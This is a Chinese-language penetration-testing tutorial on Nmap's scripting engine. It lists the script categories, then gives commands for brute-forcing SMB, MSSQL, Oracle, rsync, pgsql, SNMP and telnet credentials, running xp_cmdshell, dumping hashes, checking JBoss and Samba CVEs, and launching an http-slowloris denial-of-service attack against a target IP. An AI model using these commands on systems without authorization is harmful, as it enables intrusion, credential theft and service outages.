0x00 前言:nmap的基本介绍和基本使用方法,在乌云知识库中已经有人提交过,讲的比较详细,在此文中就不再讲述。 具体链接:http://drops./tips/2002 本文主要讲解nmap的众多脚本的使用,在内网渗透的时候尤其好用。 0x01 nmap按脚本分类扫描nmap脚本主要分为以下几类,在扫描时可根据需要设置--script=类别这种方式进行比较笼统的扫描: auth: 负责处理鉴权证书(绕开鉴权)的脚本 broadcast: 在局域网内探查更多服务开启状况,如dhcp/dns/sqlserver等服务 brute: 提供暴力破解方式,针对常见的应用如http/snmp等 default: 使用-sC或-A选项扫描时候默认的脚本,提供基本脚本扫描能力 discovery: 对网络进行更多的信息,如SMB枚举、SNMP查询等 dos: 用于进行拒绝服务攻击 exploit: 利用已知的漏洞入侵系统 external: 利用第三方的数据库或资源,例如进行whois解析 fuzzer: 模糊测试的脚本,发送异常的包到目标机,探测出潜在漏洞 intrusive: 入侵性的脚本,此类脚本可能引发对方的IDS/IPS的记录或屏蔽 malware: 探测目标机是否感染了病毒、开启了后门等信息 safe: 此类与intrusive相反,属于安全性脚本 version: 负责增强服务与版本扫描(Version Detection)功能的脚本 vuln: 负责检查目标机是否有常见的漏洞(Vulnerability),如是否有MS08_067 部分使用截图: (1) 负责处理鉴权证书(绕开鉴权)的脚本,也可以作为检测部分应用弱口令 (2) 提供暴力破解的方式 可对数据库,smb,snmp等进行简单密码的暴力猜解 (3) 默认的脚本扫描,主要是搜集各种应用服务的信息,收集到后,可再针对具体服务进行攻击 (4) 检查是否存在常见漏洞 (5) 在局域网内探查更多服务开启状况 (6) 利用第三方的数据库或资源,例如进行whois解析 0x02 nmap按应用服务扫描(1)vnc扫描: 检查vnc bypass
检查vnc认证方式
获取vnc信息
(2)smb扫描: smb破解
smb字典破解
smb已知几个严重漏
查看共享目录
查询主机一些敏感信息(注:需要下载nmap_service)
查看会话
系统信息
(3)Mssql扫描: 猜解mssql用户名和密码
xp_cmdshell 执行命令
dumphash值
(4)Mysql扫描: 扫描root空口令
列出所有mysql用户
支持同一应用的所有脚本扫描
(5)Oracle扫描: oracle sid扫描
oracle弱口令破解
(6)其他一些比较好用的脚本 nmap --script=broadcast-netbios-master-browser 192.168.137.4 发现网关 nmap -p 873 --script rsync-brute --script-args 'rsync-brute.module=www' 192.168.137.4 破解rsync nmap --script informix-brute -p 9088 192.168.137.4 informix数据库破解 nmap -p 5432 --script pgsql-brute 192.168.137.4 pgsql破解 nmap -sU --script snmp-brute 192.168.137.4 snmp破解 nmap -sV --script=telnet-brute 192.168.137.4 telnet破解 nmap --script=http-vuln-cve2010-0738 --script-args 'http-vuln-cve2010-0738.paths={/path1/,/path2/}' <target> jboss autopwn nmap --script=http-methods.nse 192.168.137.4 检查http方法 nmap --script http-slowloris --max-parallelism 400 192.168.137.4 dos攻击,对于处理能力较小的站点还挺好用的 'half-HTTP' connections nmap --script=samba-vuln-cve-2012-1182 -p 139 192.168.137.4 (7)不靠谱的脚本: vnc-brute 次数多了会禁止连接 pcanywhere-brute 同上 0x03 学会脚本分析nmap中脚本并不难看懂,所以在使用时如果不知道原理可以直接看利用脚本即可,也可以修改其中的某些参数方便自己使用。 举例: 关于oracle的弱口令破解: 调用过程:oracle-brute.nse >> oracle-default-accounts.lst 首先是调用破解脚本: 根据脚本中字典的位置去查看默认字典,当然也可以将破解的字符自行添加其中,或者是修改脚本或参数改变破解字典:
|
|